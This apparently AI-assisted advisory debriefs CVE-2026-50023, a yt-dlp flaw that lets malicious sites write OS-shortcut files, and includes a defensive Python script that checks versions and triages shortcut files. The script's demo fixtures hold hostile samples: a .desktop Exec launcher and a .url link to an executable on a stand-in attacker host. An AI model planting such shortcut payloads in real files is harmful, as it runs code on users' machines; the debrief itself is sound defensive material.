PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-50023 yt-dlp CVE debrief

CVE-2026-50023 is a high-severity vulnerability in yt-dlp, a command-line audio/video downloader. In versions prior to 2026.06.09, a remote attacker can cause yt-dlp to write arbitrary OS-shortcut files (.desktop, .url, .webloc) to the user's filesystem. The root cause is that the extension allowlist associated with the --write-link option included those shortcut extensions, so a malicious site could have its media or subtitle payload written out as a shortcut file during a normal download. Such files are not inert: a .desktop entry with an Exec= line may run that command when the user opens it, and .url and .webloc files open whatever target they name. The issue is fixed in yt-dlp 2026.06.09; update to that version or later.

Vendor
yt-dlp
Product
Unknown
CVSS
HIGH 8.3
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-23
Original CVE updated
2026-06-26
Advisory published
2026-06-23
Advisory updated
2026-06-26

Who should care

Anyone running yt-dlp older than 2026.06.09 against sites they do not control, including through wrapper scripts, media-server integrations and scheduled download jobs. The CVE record ties the flaw to the --write-link option and its platform-specific variants (--write-url-link, --write-webloc-link, --write-desktop-link), but it describes the malicious write as happening during ordinary media or subtitle downloads, and the stored evidence does not say that passing one of those flags is required for exploitation. Treat every pre-2026.06.09 installation that downloads from untrusted sources as exposed, and update to 2026.06.09 or later.

Technical summary

CVE-2026-50023 is an unsafe-file-write flaw in yt-dlp. Before 2026.06.09, the extension allowlist behind the --write-link option accepted the OS-shortcut extensions .desktop, .url and .webloc, and a remote site could therefore get a media or subtitle download saved under one of those extensions with attacker-controlled contents. The practical result is an attacker-authored launcher or link sitting in the user's download directory, which executes or opens its target as soon as the user double-clicks it. NVD scores the issue CVSS 8.3 (HIGH). The fix in yt-dlp 2026.06.09 removes the shortcut extensions from that allowlist.

Defensive priority

High. Update yt-dlp to 2026.06.09 or later now; this is a single-package upgrade with no configuration change. Until the update is in place, do not point yt-dlp at untrusted sources, with or without --write-link, and treat any .desktop, .url or .webloc file that appears in a download directory as suspect.

Recommended defensive actions

  • Update yt-dlp to version 2026.06.09 or later; check with yt-dlp --version, and remember that embedded copies inside other tools or containers need updating separately
  • Until then, do not use the --write-link option or its variants with untrusted sources, and avoid downloading from untrusted sites at all
  • Confine downloads to a dedicated output directory (yt-dlp -P / -o) rather than a directory that desktop sessions or file managers open routinely
  • Monitor download directories for the creation of .desktop, .url and .webloc files (auditd or inotify on Linux, file-system auditing on Windows) and inspect any you did not explicitly request
  • On shared or multi-user systems, sweep existing download directories for shortcut files written while a vulnerable version was in use, and delete or quarantine any whose target you cannot account for
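The version check and the shortcut-file sweep from the list above, as an added example written for this debrief rather than code from the yt-dlp project: it decides whether a reported yt-dlp version is 2026.06.09 or later, then triages every .desktop, .url and .webloc file under a download directory into a launcher (has an Exec= line), a link to a non-http target, a plain web link, or an unparsable file. The sample shortcut contents are constructed, the triage rules are this example's own heuristics (they assume that legitimate --write-link output is a Type=Link entry or a URL= line pointing at the page yt-dlp was given, never an Exec= line), and the handling of a trailing hotfix component in the version string is an assumption.

```python
"""Added example for this debrief (not yt-dlp project code): check whether an
installed yt-dlp version predates the fix for CVE-2026-50023, and triage
OS-shortcut files found in a download directory. Triage rules, sample file
names and sample contents are assumptions made for illustration."""
from __future__ import annotations

import configparser
import plistlib
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

FIXED_VERSION = (2026, 6, 9)  # first release with the fix, per the CVE record
SHORTCUT_EXTENSIONS = {".desktop", ".url", ".webloc"}
SAFE_SCHEMES = {"http", "https"}


def parse_version(version: str) -> tuple[int, ...]:
    """yt-dlp release tags are dates (YYYY.MM.DD); a trailing .N hotfix
    component (assumed format) sorts after the plain date."""
    return tuple(int(part) for part in version.strip().split("."))


def is_fixed(version: str) -> bool:
    """True when the reported yt-dlp version is 2026.06.09 or later."""
    return parse_version(version) >= FIXED_VERSION


def _ini_section(text: str, section: str) -> dict:
    """Parse the INI-style shortcut formats (.desktop, .url).
    Keys come back lowercased; unparsable input yields an empty dict."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return dict(cp[section]) if cp.has_section(section) else {}


def shortcut_target(path: Path) -> tuple[str, str | None]:
    """Return (kind, target): what the file would run or open when double-clicked."""
    ext = path.suffix.lower()
    raw = path.read_bytes()
    if ext == ".desktop":
        entry = _ini_section(raw.decode("utf-8", "replace"), "Desktop Entry")
        if "exec" in entry:  # an application launcher, not a link
            return "exec", entry["exec"]
        return "link", entry.get("url")
    if ext == ".url":
        entry = _ini_section(raw.decode("utf-8", "replace"), "InternetShortcut")
        return "link", entry.get("url")
    if ext == ".webloc":  # macOS: a property list with a URL key
        try:
            data = plistlib.loads(raw)
        except Exception:
            return "link", None
        return "link", (data.get("URL") if isinstance(data, dict) else None)
    return "other", None


def triage(path: Path) -> str:
    """'launcher' (runs a command), 'unsafe-link' (non-http target),
    'link' (plain web link) or 'unparsed'."""
    kind, target = shortcut_target(path)
    if kind == "exec":
        return "launcher"
    if target is None:
        return "unparsed"
    return "link" if urlsplit(target).scheme in SAFE_SCHEMES else "unsafe-link"


def scan(directory: Path) -> dict[str, str]:
    """Map every shortcut file under directory to its triage verdict."""
    return {p.name: triage(p) for p in sorted(directory.rglob("*"))
            if p.is_file() and p.suffix.lower() in SHORTCUT_EXTENSIONS}


def demo() -> dict[str, str]:
    """Write constructed sample files into a temporary directory and scan them."""
    samples = {  # constructed contents, not captured from a real attack
        "video.desktop": "[Desktop Entry]\nType=Application\nName=video\nExec=sh -c 'id'\n",
        "page.desktop": "[Desktop Entry]\nType=Link\nName=page\nURL=https://example.invalid/watch\n",
        "broken.desktop": "not a desktop entry at all\n",
        "clip.url": "[InternetShortcut]\nURL=file://///attacker.invalid/share/run.exe\n",
        "clip2.url": "[InternetShortcut]\nURL=https://example.invalid/watch\n",
        "song.webloc": plistlib.dumps({"URL": "https://example.invalid/track"}).decode(),
        "song.mp4": "media payload, ignored by the sweep",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            Path(tmp, name).write_text(body, encoding="utf-8")
        return scan(Path(tmp))


if __name__ == "__main__":
    print("fixed:", is_fixed("2026.06.09"), "vulnerable:", not is_fixed("2026.05.25"))
    for name, verdict in demo().items():
        print(f"{verdict:12} {name}")
```

Run it against a real directory with scan(Path("~/Downloads").expanduser()); a "launcher" verdict is the one that warrants an immediate look, because nothing yt-dlp writes on its own should carry an Exec= line.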

Evidence notes

The vulnerability is confirmed by the CVE record and the NVD detail. The CVE record supplies the description of the flaw, the affected version range and the fixed version; the NVD detail adds the CVSS 8.3 (HIGH) score. Neither source in the stored evidence reports in-the-wild exploitation or a CISA KEV listing.

Official resources

This article is AI-assisted and based on the supplied source corpus.